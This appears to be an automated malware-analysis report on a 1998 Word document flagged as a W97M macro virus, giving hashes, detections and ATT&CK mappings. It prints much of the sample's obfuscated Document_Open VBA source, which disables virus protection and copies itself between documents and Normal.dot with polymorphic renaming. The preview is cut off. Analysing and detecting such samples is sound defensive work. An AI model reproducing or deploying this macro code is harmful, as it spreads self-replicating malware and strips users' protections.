Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b507870db05f0fe…

MALICIOUS

Office (OLE)

52.5 KB Created: 1998-12-13 08:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c39de6d727ca6f56700536f93212fb82 SHA-1: 4a5d3284f6d06c4f2fb26a753f6d49948fc3b6bc SHA-256: 7b507870db05f0fe1251188dc9a657961e9d95d38061f6038518b0f104d0fd4d
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when the document is opened. The macro attempts to disable virus protection and auto-macros, suggesting an intent to evade detection and ensure execution of its payload.

Heuristics 3

  • ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29569 bytes
SHA-256: 819d6645445078a8dc2e9910b451960af5710dc7ea3a527dda67ff482f1d19a5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……ƨåڥâԺœï  = "´˜Ä¶ŸÂõ§ö¢ïç"
ß×ù•´ºê‚ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
™•µŒð�ÑâˆâàÝ÷ß = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ß×ù•´ºê‚ > 169 And ™•µŒð�ÑâˆâàÝ÷ß > 169 Then Exit Sub
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = ActiveDocument
Set ‡Óµ½’ùé„�� = NormalTemplate
GoTo •ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å
End If
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = NormalTemplate
Set ‡Óµ½’ùé„�� = ActiveDocument
End If
ReDim ƒê¶—Ð(50, 50)
¸£ƒ‡ÅÍ×Äè×ŽÌ = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
ß×ù•´ºê‚ = 0
Do Until ß×ù•´ºê‚ = ¸£ƒ‡ÅÍ×Äè׎Ì
ß×ù•´ºê‚ = ß×ù•´ºê‚ + 1
ä�Ã÷�Ð÷Ô = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(ß×ù•´ºê‚, 1)
If Left(ä�Ã÷�Ð÷Ô, 1) = "'" Then
ßùŽ äÙ‡áÕÄ­Åò = Len(ä�Ã÷�Ð÷Ô)
ä�Ã÷�Ð÷Ô = Mid(ä�Ã÷�Ð÷Ô, 2, ßùŽ äÙ‡áÕÄ­Åò)
 Ü = ""
Ê®· = Len(ä�Ã÷�Ð÷Ô)
Randomize Timer
Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²:
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ì­Ô = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
'™•µŒð�ÑâˆâàÝ÷ß
'�‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó
'‡Óµ½’ùé„��
'Ò¶Ž¸šÌ¹×ô©œ–œð
'øŠòÓù ½œ
'³‘êîˆÈ�óøÎοÍï
'ÎÁ�à­ä¢˜¤ºøœÊÜÛ
'ß×ù•´ºê‚
'Š
'™Ìòç¿ð×—¤
'젻vйà·í¡Œà˜‘‡ß
'ßùŽ äÙ‡áÕÄ­Åò
'ó•¨èÀ‚±™ÙÓ‰Ãæ•¶Æá
'ž÷�
'Æï£¯ÎàºÇÎŒ£ˆä˜´õ—ííÈÕЈ²
'Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²
'ìܷǪ¼�œÃ‰Ö�¤ÎŒ�¼¥„û÷ð”
'Ìõ·
'Ü¿ŠÏ‘Ô´˜ð
'Ê®·
'ä�Ã÷�Ð÷Ô
'Æî¨µŒ ƒ¥Ï§ÚÊ®ÆùÊ­”ôÄá™°ÄñÄŠ
'׆ò玱éç¾´·³ŸËä¹õ¿Ð‹�ˆ°¹šÛ
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'Ü¿ŠÏ‘Ô´˜ð
'ßùŽ äÙ‡áÕÄ­Åò
'Š
'§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜
'³‘êîˆÈ�óøÎοÍï
'¸£ƒ‡ÅÍ×Äè׎Ì
'­Úé÷Éï²»ú¢§ö�‡Ú̉
'݈ä �¿…ì­Ô
'™Ìòç¿ð×—¤
'�å΄�¯´­­Îñ�•¸˜
'àïü†¸
'稜»Ö¦Ýð
'ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�
'õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
' Ü
'‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­
'êµ—èùÙ×ß¹Èö¶ˆ£
'݈ä �¿…ì­Ô
'ƒê¶—Ð
'À½
'ß×ù•´ºê‚
'°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘
'ò‹ŸÍž¼ÎÄ̤²
'•ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å
'¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š:
ò‹ŸÍž¼ÎÄ̤² = CInt(Rnd * 250) + 1
If ò‹ŸÍž¼ÎÄ̤² = 13 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 65 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
If ò‹ŸÍž¼ÎÄ̤² < 130 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š
 Ü =  Ü & Chr(ò‹ŸÍž¼ÎÄ̤²)
Next ݈ä �¿…ì­Ô
ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� = ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� + 1
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 1) = ä�Ã÷�Ð÷Ô
ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 2) =  Ü
End If
Loop
•ŠÊ¨Ä ÖÌÓÙ£¡µˆ­ÁÀÒé§’ë ±å:
ß×ù•´ºê‚ = 1
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = "Private Sub Document_Open()" & Chr(13)
If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1
For ݈ä �¿…ì­Ô = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
�å΄�¯´­­Îñ�•¸˜:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo �å΄�¯´­­Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 65 Then GoTo �å΄�¯´­­Îñ�•¸˜
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo �å΄�¯´­­Îñ�•¸˜
 Ü =  Ü & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ݈ä �¿…ì­Ô
êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 20)
For ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£
àïü†¸:
Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð = 34 Then GoTo àïü†¸
If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo àïü†¸
°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ = °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(Ü¿ŠÏ‘Ô´˜ð)
Next ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ­
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ &  Ü & "=" & Chr(34) & °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(34) & Chr(13)
End If
ßùŽ äÙ‡áÕÄ­Åò = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines
For Š = 2 To ßùŽ äÙ‡áÕÄ­Åò
§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(Š, 1) & Chr(13)
Next Š
If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then GoTo ¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……
Do
³‘êîˆÈ�óøÎοÍï = 0
¸£ƒ‡ÅÍ×Äè×ŽÌ = Len(§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜)
À½ = À½ + 1
If ƒê¶—Ð(À½, 1) = 
... (truncated)